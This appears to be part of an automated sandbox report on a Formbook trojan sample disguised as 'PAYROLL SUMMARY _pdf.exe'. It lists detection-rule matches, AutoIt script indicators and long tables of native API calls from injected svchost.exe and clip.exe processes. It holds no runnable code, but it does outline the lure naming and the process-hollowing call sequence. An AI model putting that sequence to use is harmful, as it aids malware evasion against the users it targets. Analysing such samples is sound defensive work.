Source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00253B4C
Source: PAYROLL SUMMARY _pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PAYROLL SUMMARY _pdf.exe, 00000000.00000000.2125452488.0000000000305000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_82396bac-a
Source: PAYROLL SUMMARY _pdf.exe, 00000000.00000000.2125452488.0000000000305000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c22cd6cb-7
Source: PAYROLL SUMMARY _pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8c51d5d6-d
Source: PAYROLL SUMMARY _pdf.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8a5150fc-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PAYROLL SUMMARY _pdf.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042AFF3 NtClose,	2_2_0042AFF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B60 NtClose,LdrInitializeThunk,	2_2_03772B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03772DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03772C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,	2_2_037735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774340 NtSetContextThread,	2_2_03774340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774650 NtSuspendThread,	2_2_03774650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BF0 NtAllocateVirtualMemory,	2_2_03772BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BE0 NtQueryValueKey,	2_2_03772BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BA0 NtEnumerateValueKey,	2_2_03772BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B80 NtQueryInformationFile,	2_2_03772B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AF0 NtWriteFile,	2_2_03772AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AD0 NtReadFile,	2_2_03772AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AB0 NtWaitForSingleObject,	2_2_03772AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F60 NtCreateProcessEx,	2_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F30 NtCreateSection,	2_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FE0 NtCreateFile,	2_2_03772FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FB0 NtResumeThread,	2_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FA0 NtQuerySection,	2_2_03772FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F90 NtProtectVirtualMemory,	2_2_03772F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E30 NtWriteVirtualMemory,	2_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EE0 NtQueueApcThread,	2_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EA0 NtAdjustPrivilegesToken,	2_2_03772EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E80 NtReadVirtualMemory,	2_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D30 NtUnmapViewOfSection,	2_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D10 NtMapViewOfSection,	2_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D00 NtSetInformationFile,	2_2_03772D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DD0 NtDelayExecution,	2_2_03772DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DB0 NtEnumerateKey,	2_2_03772DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C60 NtCreateKey,	2_2_03772C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C00 NtQueryInformationProcess,	2_2_03772C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CF0 NtOpenProcess,	2_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CC0 NtQueryVirtualMemory,	2_2_03772CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CA0 NtQueryInformationToken,	2_2_03772CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773010 NtOpenDirectoryObject,	2_2_03773010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773090 NtSetValueKey,	2_2_03773090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037739B0 NtGetContextThread,	2_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D70 NtOpenThread,	2_2_03773D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D10 NtOpenProcessToken,	2_2_03773D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04944650 NtSuspendThread,LdrInitializeThunk,	4_2_04944650
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04944340 NtSetContextThread,LdrInitializeThunk,	4_2_04944340
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04942CA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04942C70
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942C60 NtCreateKey,LdrInitializeThunk,	4_2_04942C60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942DD0 NtDelayExecution,LdrInitializeThunk,	4_2_04942DD0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04942DF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_04942D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_04942D30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_04942E80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_04942EE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942FB0 NtResumeThread,LdrInitializeThunk,	4_2_04942FB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942FE0 NtCreateFile,LdrInitializeThunk,	4_2_04942FE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942F30 NtCreateSection,LdrInitializeThunk,	4_2_04942F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942AD0 NtReadFile,LdrInitializeThunk,	4_2_04942AD0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942AF0 NtWriteFile,LdrInitializeThunk,	4_2_04942AF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_04942BA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04942BF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_04942BE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942B60 NtClose,LdrInitializeThunk,	4_2_04942B60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049435C0 NtCreateMutant,LdrInitializeThunk,	4_2_049435C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049439B0 NtGetContextThread,LdrInitializeThunk,	4_2_049439B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942CC0 NtQueryVirtualMemory,	4_2_04942CC0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942CF0 NtOpenProcess,	4_2_04942CF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942C00 NtQueryInformationProcess,	4_2_04942C00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942DB0 NtEnumerateKey,	4_2_04942DB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942D00 NtSetInformationFile,	4_2_04942D00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942EA0 NtAdjustPrivilegesToken,	4_2_04942EA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942E30 NtWriteVirtualMemory,	4_2_04942E30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942F90 NtProtectVirtualMemory,	4_2_04942F90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942FA0 NtQuerySection,	4_2_04942FA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942F60 NtCreateProcessEx,	4_2_04942F60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942AB0 NtWaitForSingleObject,	4_2_04942AB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04942B80 NtQueryInformationFile,	4_2_04942B80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04943090 NtSetValueKey,	4_2_04943090
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04943010 NtOpenDirectoryObject,	4_2_04943010
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04943D10 NtOpenProcessToken,	4_2_04943D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04943D70 NtOpenThread,	4_2_04943D70
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005B7B40 NtCreateFile,	4_2_005B7B40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005B7CA0 NtReadFile,	4_2_005B7CA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005B7D90 NtDeleteFile,	4_2_005B7D90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005B7E30 NtClose,	4_2_005B7E30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005B7F90 NtAllocateVirtualMemory,	4_2_005B7F90

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002B4021: CreateFileW,DeviceIoControl,CloseHandle,

0_2_002B4021

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_002A8858

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_002B545F

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0025E800	0_2_0025E800
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0027DBB5	0_2_0027DBB5
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0025E060	0_2_0025E060
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002D804A	0_2_002D804A
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00264140	0_2_00264140
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00272405	0_2_00272405
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00286522	0_2_00286522
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002D0665	0_2_002D0665
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0028267E	0_2_0028267E
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0027283A	0_2_0027283A
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00266843	0_2_00266843
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002889DF	0_2_002889DF
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00268A0E	0_2_00268A0E
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00286A94	0_2_00286A94
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002D0AE2	0_2_002D0AE2
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002AEB07	0_2_002AEB07
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002B8B13	0_2_002B8B13
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0027CD61	0_2_0027CD61
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00287006	0_2_00287006
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0026710E	0_2_0026710E
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00263190	0_2_00263190
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00251287	0_2_00251287
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002733C7	0_2_002733C7
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0027F419	0_2_0027F419
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00265680	0_2_00265680
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002716C4	0_2_002716C4
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002658C0	0_2_002658C0
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002778D3	0_2_002778D3
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00271BB8	0_2_00271BB8
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00289D05	0_2_00289D05
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0025FE40	0_2_0025FE40
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_0027BFE6	0_2_0027BFE6
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_00271FD0	0_2_00271FD0
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_03DC3610	0_2_03DC3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004011C0	2_2_004011C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004021A5	2_2_004021A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004021B0	2_2_004021B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FACB	2_2_0040FACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FAD3	2_2_0040FAD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402320	2_2_00402320
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004023BC	2_2_004023BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D443	2_2_0042D443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416433	2_2_00416433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FCF3	2_2_0040FCF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DD73	2_2_0040DD73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F50	2_2_00402F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038003E6	2_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C02C0	2_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038001AA	2_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730100	2_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F81CC	2_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F41A2	2_2_037F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764750	2_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C6E0	2_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03800591	2_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F2446	2_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4420	2_2_037E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EE4F6	2_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F6BD7	2_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380A9A6	2_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374A840	2_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E8F0	2_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037268B8	2_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760F30	2_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E2F30	2_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03782F28	2_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374CFE0	2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732FC8	2_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BEFA0	2_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740E59	2_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEE26	2_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEEDB	2_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752E90	2_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FCE93	2_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DCD1F	2_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374AD00	2_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373ADE0	2_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03758DBF	2_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740C00	2_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730CF2	2_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0CB5	2_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372D34C	2_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F132D	2_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0378739A	2_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E12ED	2_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B2C0	2_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037452A0	2_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372F172	2_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377516C	2_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374B1B0	2_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380B16B	2_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F70E9	2_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF0E0	2_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EF0CC	2_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037470C0	2_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF7B0	2_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03785630	2_2_03785630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F16CC	2_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7571	2_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038095C3	2_2_038095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DD5B0	2_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03731460	2_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF43F	2_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFB76	2_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B5BF0	2_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377DBF9	2_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FB80	2_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B3A6C	2_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFA49	2_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7A46	2_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EDAC6	2_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DDAAC	2_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03785AA0	2_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E1AA3	2_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749950	2_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B950	2_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D5910	2_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AD800	2_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037438E0	2_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFF09	2_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03703FD2	2_2_03703FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03703FD5	2_2_03703FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFFB1	2_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03741F92	2_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749EB0	2_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7D73	2_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F1D5A	2_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03743D40	2_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FDC0	2_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B9C32	2_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFCF2	2_2_037FFCF2
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AD69E2	3_2_03AD69E2
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AD8962	3_2_03AD8962
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03ADF0A2	3_2_03ADF0A2
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AF60B2	3_2_03AF60B2
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AD873A	3_2_03AD873A
